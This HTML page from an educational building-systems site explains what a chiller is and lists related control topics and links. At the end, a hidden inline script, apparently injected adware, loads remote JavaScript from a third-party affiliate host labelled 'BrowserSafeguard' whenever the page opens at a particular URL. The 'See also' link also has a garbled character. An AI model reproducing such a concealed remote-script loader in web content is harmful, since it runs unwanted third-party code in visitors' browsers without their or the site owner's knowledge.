﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>CHILLER</h1>
<!--<h3>Associated System: </h3>-->
<div class="graphic"> <img src="../HVAC Rooftop/Chiller.png" alt=""/ ></div>     
<p>A chiller is a machine that creates and provides chilled water to the chilled water loop of an building's centralized HVAC system. This chilled water is used to perform a heat exchange between the water and air that passes through the coils. This air is then delivered into the building by AHUs.</p>
<p>(<a href="#">See also the �</a> )</p>
<!--<p></p>-->      
<!--<h4></h4>-->
<!--<h2>Variable Descriptions</h2>-->      
<!--<ul class="list-variable">-->        
<!--<li><label>Default:</label> </li>-->
<!--<li><label>Minimum:</label> </li>-->
<!--<li><label>Maximum:</label> </li>-->
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->        
<!--<li><label>IP Unit:</label> </li>-->
<!--<li><label>SI Units:</label> </li>-->
<!--</ul>-->
<h2>Related Items: </h2>
<ul> <li>Chiller COP</li><li>Chilled water loop differential pressure set point reset</li><li>Chiller start/stop control strategy</li><li>Chilled water temp reset</li><li>Chilled water temp set point</li> </ul>
<h2>Links:</h2>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Chiller" target="_blank">http://en.wikipedia.org/wiki/Chiller</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li></ul>
<div class="version"> Version 1.00</div>    </div></div></div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();
</script>
</body>
</html>
